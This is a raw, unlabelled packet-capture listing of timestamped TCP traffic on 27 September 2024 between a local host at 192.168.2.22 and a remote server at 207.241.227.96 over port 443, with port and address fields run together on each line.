                                                                                            Sep 27, 2024 14:00:17.202927113 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.202933073 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.202950954 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.202996016 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.203561068 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.205184937 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.205248117 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.205265999 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.205291986 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.205331087 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.207005978 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.207089901 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.207150936 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.207154989 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.207176924 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.207218885 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.207242966 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.209069014 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.209151983 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.209151030 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.209173918 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.209213972 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.211664915 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.211739063 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.211752892 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.211769104 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.211806059 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.215327024 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.226210117 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.226279974 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.226284981 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.226305008 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.226341963 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.246824980 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.246896029 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.246901035 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.246921062 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.246964931 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.269670010 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.269695997 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.269769907 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.269856930 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.269896984 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.290265083 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.290338039 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.290374994 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.290466070 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.290508986 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.292032003 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.292094946 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.292098045 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.292126894 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.292161942 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.294533014 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.294598103 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.294604063 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.294629097 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.294667959 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.296277046 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.296340942 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.296341896 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.296366930 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.296407938 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.298032999 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.298098087 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.298103094 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.298129082 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.298166037 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.310530901 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.312535048 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.312639952 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.312639952 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.312663078 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.312706947 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.316149950 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.349112034 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.349189043 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.349215031 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.349340916 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.351999044 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.369117022 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.369138956 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.369177103 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.369221926 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.369252920 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.373100996 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.376859903 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.376883030 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.376919985 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.376940012 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.376966000 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.377557039 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.379086018 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.379108906 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.379165888 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.379165888 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.379182100 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.380956888 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.380981922 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.381016016 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.381036997 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.381062031 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.381792068 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.382811069 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.382833004 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.382879972 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.382879972 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.382895947 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.384511948 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.384536028 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.384569883 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.384589911 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.384615898 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.385025978 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.399286985 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.399353027 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.399358988 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.399378061 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.399437904 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.421248913 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.440634012 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.440701962 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.440716028 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.440735102 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.440768003 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.455862999 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.455934048 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.455943108 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.455961943 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.456001043 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.463412046 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.463433981 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.463483095 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.463510036 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.463535070 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.464824915 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.464852095 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.464890957 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.464890957 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.464911938 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.464957952 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.466684103 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.466705084 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.466741085 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.466761112 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.466785908 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.468555927 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.468580961 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.468616009 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.468636036 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.468661070 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.470251083 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.470276117 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.470323086 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.470323086 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.470340967 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.486182928 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.486212015 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.486258030 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.486296892 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.486329079 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.490767956 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.523525953 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.523556948 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.523641109 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.523641109 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.523705959 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.523746967 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.542164087 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.542196035 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.542248964 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.542248964 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.542277098 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.542309999 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.549879074 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.549904108 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.549968958 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.549994946 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.550019979 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.550019979 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.551956892 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.551981926 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.552015066 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.552035093 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.552061081 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.552061081 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.552843094 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.552864075 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.552900076 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.552921057 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.552947044 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.552947044 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.554584026 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.554609060 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.554639101 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.554657936 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.554682016 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.554682016 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.556169987 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.556199074 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.556231022 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.556231022 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.556246996 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.556277990 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.556277990 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.599176884 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.599208117 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.599266052 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.599288940 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.599312067 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.609389067 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.615323067 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.615353107 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.615439892 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.615439892 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.615457058 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.629280090 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.629308939 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.629375935 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.629389048 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.629439116 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.637132883 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.637164116 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.637211084 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.637219906 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.637244940 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.638292074 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.638319969 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.638340950 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.638346910 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.638362885 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.639267921 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.639296055 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.639316082 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.639322042 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.639343977 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.639358997 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.640595913 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.641210079 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.641237974 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.641274929 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.641280890 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.641290903 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.641334057 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.642179012 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.642201900 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.642231941 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.642236948 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.642257929 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.646878004 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.686244011 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.686281919 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.686424017 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.686491966 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.687429905 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.702049017 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.702120066 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.702183962 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.702203035 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.702249050 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.716331959 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.717173100 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.717241049 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.717259884 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.717273951 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.717314005 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.724208117 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.724282980 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.724298000 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.724314928 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.724349022 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.725337029 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.725337982 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.725372076 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.725404978 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.725460052 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.725512981 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.725528002 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.725615025 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.726702929 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.726768017 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.726780891 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.726795912 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.726825953 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.727581024 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.727649927 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.727720022 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.727720976 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.727740049 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.728712082 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.729248047 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.729312897 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.729312897 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.729336977 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.729372025 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.772849083 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.772891045 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.772958994 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.772981882 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.772994041 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.774200916 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.788922071 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.788945913 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.789025068 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.789031029 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.789056063 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.803271055 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.803297043 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.803340912 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.803348064 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.803364038 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.803946972 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.811021090 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.811043024 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.811105013 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.811111927 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.811147928 CEST49162443192.168.2.22207.241.227.96
                                                                                            Sep 27, 2024 14:00:17.811831951 CEST44349162207.241.227.96192.168.2.22
                                                                                            Sep 27, 2024 14:00:17.811852932 CEST44349162207.241.227.96192.168.2.22
